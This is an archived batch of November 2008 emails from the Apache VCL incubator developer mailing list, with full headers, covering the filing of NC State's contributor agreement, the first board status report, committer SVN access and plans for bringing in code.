<mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49969 invoked by uid 99); 14 Nov 2008 14:26:00 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 06:26:00 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-02-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 14:24:39 +0000 Received: from bi01p1.nc.us.ibm.com ([161.129.204.104] helo=Hogstrom-009027164127.raleigh.ibm.com) by mho-02-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L0zbu-000KZd-BL; Fri, 14 Nov 2008 14:25:22 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX18ktlRMvNCarMDEdBu5zQhb Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: CCLA for NC State Date: Fri, 14 Nov 2008 09:25:18 -0500 Cc: [email protected] X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org The VCL Incubator project was approved at the end of September. Recently the accounts have been created and we are ready to move on to vetting the code. At this point the CCLA from NCState does not appear to have been logged in officers/cclas.txt. Is this the correct place ? The CCLA has been FAXed, snail mailed and e-mailed. I expect Apache Con didn't help matters. Is there something holding up this CCLA that we need to do on our end or is this in an Apache queue somewhere? Thanks Matt From [email protected] Fri Nov 14 14:27:39 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75868 invoked from network); 14 Nov 2008 14:27:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 14:27:39 -0000 Received: (qmail 51751 invoked by uid 500); 14 Nov 2008 14:27:46 -0000 Delivered-To: [email protected] Received: (qmail 51733 invoked by uid 500); 14 Nov 2008 14:27:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51722 invoked by uid 99); 14 Nov 2008 14:27:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 06:27:46 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-02-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 14:26:25 +0000 Received: from bi01p1.nc.us.ibm.com ([161.129.204.104] helo=Hogstrom-009027164127.raleigh.ibm.com) by mho-02-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L0zdc-000LDg-At for [email protected]; Fri, 14 Nov 2008 14:27:08 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX19mlmqPGdgHIT2ETXl9uN3k Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Board Report Date: Fri, 14 Nov 2008 09:27:07 -0500 X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org We owe the board a report on the project. I will create a dir in the svn tree and add a report that we will post to the Incubator PMC. At this point its been mostly administrative items that I think are now mostly complete. Our next step is to start bringing in the code, updating copyrights and getting organized. Once we have the thumbs up from the Apache Secretary we can begin that process. Let the games begin . From [email protected] Fri Nov 14 14:35:19 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78783 invoked from network); 14 Nov 2008 14:35:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 14:35:19 -0000 Received: (qmail 64013 invoked by uid 500); 14 Nov 2008 14:35:27 -0000 Delivered-To: [email protected] Received: (qmail 63995 invoked by uid 500); 14 Nov 2008 14:35:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63982 invoked by uid 99); 14 Nov 2008 14:35:27 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 06:35:27 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-02-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 14:34:05 +0000 Received: from bi01p1.nc.us.ibm.com ([161.129.204.104] helo=Hogstrom-009027164127.raleigh.ibm.com) by mho-02-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L0zl3-000NiY-1o; Fri, 14 Nov 2008 14:34:49 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX19DiV6cppUjFvLKAygquPxX Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: November Board Report - VCL Date: Fri, 14 Nov 2008 09:34:47 -0500 Cc: [email protected] X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org Please accept the November Status report for VCL. The text can be found at http://svn.apache.org/repos/asf/incubator/vcl/reports/board-200811.txt Inlined for convenience: Incubator Project - VCL Status for November 2008 This is the first report to the board since being bootstrapped. Over the past month we have created our SVN tree and started some of the administrative actions. Community ========= User IDs were created for: Aaron Peeler (NCSU) [MAILTO] [email protected] Andy Kurth (NCSU) [MAILTO] [email protected] Brian Bouterse (IBM) [MAILTO] [email protected] John Bass (NCSU) [MAILTO] [email protected] Josh Thompson (NCSU) [MAILTO] [email protected] Mark Gardner (VA Tech) [MAILTO] [email protected] Mladen Vouk (NCSU) [MAILTO] [email protected] Steve Thorpe (MCNC) [MAILTO] [email protected] Don Sizemore (UNC-CH) [MAILTO] [email protected] Ken Chestnutt (UNC-CH) [MAILTO] [email protected] Paul Jones (UNC-CH) [MAILTO] [email protected] Next Steps ========== The CCLA from NC State has been transmitted to Apache and we are looking for confirmation in officers/cclas.txt so we can begin introducing code. Our next steps are to complete IP clearance and get organized. From [email protected] Fri Nov 14 14:37:58 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79903 invoked from network); 14 Nov 2008 14:37:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 14:37:57 -0000 Received: (qmail 65913 invoked by uid 500); 14 Nov 2008 14:38:05 -0000 Delivered-To: [email protected] Received: (qmail 65895 invoked by uid 500); 14 Nov 2008 14:38:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65884 invoked by uid 99); 14 Nov 2008 14:38:05 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 06:38:05 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yx-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 14:36:43 +0000 Received: by yx-out-1718.google.com with SMTP id 36so622408yxh.0 for <[email protected]>; Fri, 14 Nov 2008 06:37:27 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:mime-version :subject:date:references:x-mailer; bh=+yiChBrmPmAp8Ub5ye61eIl8fsPIdGj09imbb1ot9Nc=; b=esNUh9MurJDiKtyIejvQmW2dZSoBx3cpFtDsl5WEdlWj9P9nozdD5DTLDZmiN7vv0/ X1W9B7FVRnfV/Nlztd0awNpAdRPfe307LYqSGagESbxhbWdG8cWiqlwJohgdvaCcNQrs YDqULlcDi6FZBvKmo6r696BxZslw0OTjGRf6g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:mime-version:subject:date:references :x-mailer; b=bQFm63zptK6bOuZQc+Uz9E5m7gHUk4q/1FlKA7e0VpxH6quAdbh4FuCD6WktKwi6IF m4FS9Sq9r1ccsXDnYhU0FlfwipJBkXP5nATjPHsutqeJUPbm4Dm/zyHtBRg4xxJt7/T+ bCAzGEzUz3P63n2x/XzfS0aUjCfXk9Xn1cdp0= Received: by 161.129.204.104 with SMTP id g17mr1920960ybd.216.1226673446884; Fri, 14 Nov 2008 06:37:26 -0800 (PST) Received: from ?161.129.204.104? (cpe-076-182-095-055.nc.res.rr.com [161.129.204.104]) by mx.google.com with ESMTPS id a68sm548400rnc.17.2161.129.204.104.37.26 (version=TLSv1/SSLv3 cipher=RC4-MD5); Fri, 14 Nov 2008 06:37:26 -0800 (PST) Message-Id: <[email protected]> From: Kevan Miller <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: Accounts Created - Need Karma Date: Fri, 14 Nov 2008 09:37:25 -0500 References: <[email protected]> X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org On Nov 14, 2008, at 9:22 AM, Matt Hogstrom wrote: > Looks like the majority of the accounts have been created. I expect > that everyone that is listed below has received a private e-mail > with your access information. Kevan, can you grant karma for these > folks to vcl in the asf-authorizations files? Sure. --kevan > > > dls Don Sizemore > fapeeler Aaron Peeler > akurth Andrew Kurth > bmbouter Brian Bouterse > jbass John Bass > jfthomps Josh Thompson > mkg Mark Gardner > vouk Mladen Vouk > thorpe Steven Thorpe > > I'll post a separate thread on what we need to do to get going. From [email protected] Fri Nov 14 15:00:02 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91561 invoked from network); 14 Nov 2008 15:00:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 15:00:02 -0000 Received: (qmail 4792 invoked by uid 500); 14 Nov 2008 15:00:06 -0000 Delivered-To: [email protected] Received: (qmail 4782 invoked by uid 500); 14 Nov 2008 15:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4754 invoked by uid 99); 14 Nov 2008 15:00:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 07:00:06 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 14:58:44 +0000 Received: by yw-out-1718.google.com with SMTP id 5so627189ywr.0 for <[email protected]>; Fri, 14 Nov 2008 06:59:17 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:mime-version :subject:date:references:x-mailer; bh=N0mfNkzK8yYrM1RFFGFNs4CzCe7L/hH6OGYM6chg9N0=; b=bhs86rLt6NgZoi+oUWAQklaiHkhG9I9Y8QvrJtT+TQ/qwVMl7c9gfBknoX0WzutOt1 KdTSIV21Bvbn1s4DkekZ9eA4Ae547XkNsjyBW1TV/8p3cJlbnBQNLyb/tlCkOEmnL5G1 3Ua0nRdRrCz/D5DIJrxn4sagDJzFOIn6AHoWg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:mime-version:subject:date:references :x-mailer; b=hKdtB7Lfnzp3rfdj2Tm2p+7DPrDIXC5WdMfITYU6ud72YdRJmWNDDb7IAl0YSN7bom 69RdUqhxJ+nyNCZU0Dt3WOBZycAGLXjd3JhbC9TbS4gnxMj8EeREQGlmBKA5KtJhGqbR N95k5R/xa1EyNI8NGfB5+Q60jgYPdWxcxi+WQ= Received: by 161.129.204.104 with SMTP id a15mr1966526ybk.108.1226674262640; Fri, 14 Nov 2008 06:51:02 -0800 (PST) Received: from ?161.129.204.104? (cpe-076-182-095-055.nc.res.rr.com [161.129.204.104]) by mx.google.com with ESMTPS id j13sm548709rne.4.2161.129.204.104.51.02 (version=TLSv1/SSLv3 cipher=RC4-MD5); Fri, 14 Nov 2008 06:51:02 -0800 (PST) Message-Id: <[email protected]> From: Kevan Miller <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: Accounts Created - Need Karma Date: Fri, 14 Nov 2008 09:51:01 -0500 References: <[email protected]> X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org On Nov 14, 2008, at 9:22 AM, Matt Hogstrom wrote: > Looks like the majority of the accounts have been created. I expect > that everyone that is listed below has received a private e-mail > with your access information. Kevan, can you grant karma for these > folks to vcl in the asf-authorizations files? OK. Everybody should have svn authorization, now. Here's a guide for new committers: http://www.apache.org/dev/new-committers-guide.html --kevan > > > dls Don Sizemore > fapeeler Aaron Peeler > akurth Andrew Kurth > bmbouter Brian Bouterse > jbass John Bass > jfthomps Josh Thompson > mkg Mark Gardner > vouk Mladen Vouk > thorpe Steven Thorpe > > I'll post a separate thread on what we need to do to get going. From [email protected] Fri Nov 14 16:16:32 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19586 invoked from network); 14 Nov 2008 16:16:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 16:16:31 -0000 Received: (qmail 89051 invoked by uid 500); 14 Nov 2008 16:16:39 -0000 Delivered-To: [email protected] Received: (qmail 89044 invoked by uid 500); 14 Nov 2008 16:16:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 9377 invoked by uid 99); 14 Nov 2008 15:02:38 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:cc:in-reply-to:mime-version:content-type :content-transfer-encoding:content-disposition:references :x-google-sender-auth; bh=tGs1UisVp5Ni6o21TpX/0+4rHjxz+61127U7/8mdxFs=; b=o/oOpkBNz/sWDX54pQYi625KmYtwTGNx0wUPxUHaKL4sYX4LpA5+ujoOmIWTVVSqU9 0Gl86QfiFSr8avs5lveTevR6v9qQ/bg3eEvKD97sUpV0XsK/5D0XOlzuwuhrqkLKZvi7 wk1+sDySvk69wXhrpgUgvOyFeYxCPXAifQdbM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version :content-type:content-transfer-encoding:content-disposition :references:x-google-sender-auth; b=xlvG2oz4VFfCmgMadqISmVNdYEFRlR62V04Rc4T+ozrZYgLJWKjeO0ABdNb2VkzBDB l0bf3OQjoNIjbFNZOQ1v6saOAYN0zIq8Z14ZSDYh+dgWpv6UoGo5TrOwmERMeVm8Gt9h ICq3egbHhLeurOkjVss4Z0gdwZ3eP6fvWo8uU= Message-ID: <[email protected]> Date: Fri, 14 Nov 2008 10:01:50 -0500 From: "Sam Ruby" <[email protected]> Sender: [email protected] To: "Matt Hogstrom" <[email protected]> Subject: Re: CCLA for NC State Cc: [email protected], [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Google-Sender-Auth: 3e4585c00b45dcf2 X-Virus-Checked: Checked by ClamAV on apache.org It was filed as a software grant. In fact, it was done so three times. I'm keeping this one: https://svn.apache.org/repos/private/documents/grants/ncsu-vcl.pdf And removing the following: https://svn.apache.org/repos/private/documents/grants/NSCU.pdf https://svn.apache.org/repos/private/documents/grants/NCSU.pdf I need to review the policy for how to handle documentss that are both grants and cclas, but meanwhile I would suggest that vcl is good to go. - Sam Ruby On Fri, Nov 14, 2008 at 9:25 AM, Matt Hogstrom <[email protected]> wrote: > The VCL Incubator project was approved at the end of September. Recently > the accounts have been created and we are ready to move on to vetting the > code. At this point the CCLA from NCState does not appear to have been > logged in officers/cclas.txt. Is this the correct place ? > > The CCLA has been FAXed, snail mailed and e-mailed. I expect Apache Con > didn't help matters. Is there something holding up this CCLA that we need > to do on our end or is this in an Apache queue somewhere? > > Thanks > > Matt > From [email protected] Fri Nov 14 16:17:44 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19929 invoked from network); 14 Nov 2008 16:17:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 16:17:44 -0000 Received: (qmail 93322 invoked by uid 500); 14 Nov 2008 16:17:51 -0000 Delivered-To: [email protected] Received: (qmail 93313 invoked by uid 500); 14 Nov 2008 16:17:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93292 invoked by uid 99); 14 Nov 2008 16:17:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 08:17:51 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-02-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 16:16:30 +0000 Received: from bi01p1.nc.us.ibm.com ([161.129.204.104] helo=Hogstrom-009027164127.raleigh.ibm.com) by mho-02-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L11M9-0007dt-0n; Fri, 14 Nov 2008 16:17:13 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX18umIUBmQJ4ErKljntKTdKj Cc: [email protected], [email protected] Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: Sam Ruby <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: CCLA for NC State Date: Fri, 14 Nov 2008 11:17:11 -0500 References: <[email protected]> <[email protected]> X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org Thanks Sam. I guess I was looking in the wrong place :) We'll start our bits now. On Nov 14, 2008, at 10:01 AM, Sam Ruby wrote: > It was filed as a software grant. In fact, it was done so three > times. > > I'm keeping this one: > > https://svn.apache.org/repos/private/documents/grants/ncsu-vcl.pdf > > And removing the following: > > https://svn.apache.org/repos/private/documents/grants/NSCU.pdf > https://svn.apache.org/repos/private/documents/grants/NCSU.pdf > > I need to review the policy for how to handle documentss that are both > grants and cclas, but meanwhile I would suggest that vcl is good to > go. > > - Sam Ruby > > On Fri, Nov 14, 2008 at 9:25 AM, Matt Hogstrom <[email protected]> > wrote: >> The VCL Incubator project was approved at the end of September. >> Recently >> the accounts have been created and we are ready to move on to >> vetting the >> code. At this point the CCLA from NCState does not appear to have >> been >> logged in officers/cclas.txt. Is this the correct place ? >> >> The CCLA has been FAXed, snail mailed and e-mailed. I expect >> Apache Con >> didn't help matters. Is there something holding up this CCLA that >> we need >> to do on our end or is this in an Apache queue somewhere? >> >> Thanks >> >> Matt >> > From [email protected] Fri Nov 14 16:22:08 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21764 invoked from network); 14 Nov 2008 16:22:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 16:22:07 -0000 Received: (qmail 5711 invoked by uid 500); 14 Nov 2008 16:22:15 -0000 Delivered-To: [email protected] Received: (qmail 5698 invoked by uid 500); 14 Nov 2008 16:22:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5687 invoked by uid 99); 14 Nov 2008 16:22:15 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 08:22:15 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-02-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 16:20:54 +0000 Received: from bi01p1.nc.us.ibm.com ([161.129.204.104] helo=Hogstrom-009027164127.raleigh.ibm.com) by mho-02-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L11QQ-00092i-3B for [email protected]; Fri, 14 Nov 2008 16:21:38 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX1+L5Y2CUWa3Zllx2cHHPvO7 Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Code integration Date: Fri, 14 Nov 2008 11:21:35 -0500 X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org Alan, et al. Since you've been through this part a few times what are the next steps for getting code into the VCL project? My initial guess is to have one of the NC State folks check it in to SVN and then we begin changing copyrights, etc. As a heads up, before checking in code I understand that the VCL code base uses several different projects we should not be checking in items that are non-Apache licensed. For the dependencies we should highlight what they are and where to get them. It would be really useful if we started documenting some of this on the Wiki so folks who sniff the project can see what's what, where they can get involved, etc. Anyone out there interested in helping out with pulling some of that together? From [email protected] Fri Nov 14 21:35:24 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52709 invoked from network); 14 Nov 2008 21:35:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 21:35:24 -0000 Received: (qmail 96298 invoked by uid 500); 14 Nov 2008 21:35:31 -0000 Delivered-To: [email protected] Received: (qmail 96287 invoked by uid 500); 14 Nov 2008 21:35:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96276 invoked by uid 99); 14 Nov 2008 21:35:31 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 13:35:31 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO uni12mr.unity.ncsu.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 21:34:10 +0000 Received: from [161.129.204.104] (cpe-069-134-224-088.nc.res.rr.com [161.129.204.104]) (authenticated bits=0) by uni12mr.unity.ncsu.edu (8.13.7/8.13.8/Nv5.2008.0610.1) with ESMTP id mAELWK04022710 (version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=NO) for <[email protected]>; Fri, 14 Nov 2008 16:32:21 -0500 (EST) Message-Id: <[email protected]> From: Brian Bouterse <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: Code integration Date: Fri, 14 Nov 2008 16:32:20 -0500 References: <[email protected]> X-Mailer: Apple Mail (2.929.2) X-PMX-Version: 161.129.204.1040218, Antispam-Engine: 161.129.204.1043940, Antispam-Data: 2161.129.204.104621 X-Spam-Level: IIIIIII X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, Hits=7% I'm ready to contribute some documentation, but I don't know who/how to create the vcl apache.org wiki. Who can provide this? Best, Brian Brian Bouterse Secure Open Systems Initiative 629-259-4888 On Nov 14, 2008, at 11:21 AM, Matt Hogstrom wrote: > Alan, et al. > > Since you've been through this part a few times what are the next > steps for getting code into the VCL project? > > My initial guess is to have one of the NC State folks check it in to > SVN and then we begin changing copyrights, etc. > > As a heads up, before checking in code I understand that the VCL > code base uses several different projects we should not be checking > in items that are non-Apache licensed. For the dependencies we > should highlight what they are and where to get them. It would be > really useful if we started documenting some of this on the Wiki so > folks who sniff the project can see what's what, where they can get > involved, etc. Anyone out there interested in helping out with > pulling some of that together? > > From [email protected] Tue Nov 18 16:56:29 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93222 invoked from network); 18 Nov 2008 16:56:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Nov 2008 16:56:28 -0000 Received: (qmail 66281 invoked by uid 500); 18 Nov 2008 16:56:37 -0000 Delivered-To: [email protected] Received: (qmail 66273 invoked by uid 500); 18 Nov 2008 16:56:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66262 invoked by uid 99); 18 Nov 2008 16:56:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Nov 2008 08:56:36 -0800 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO 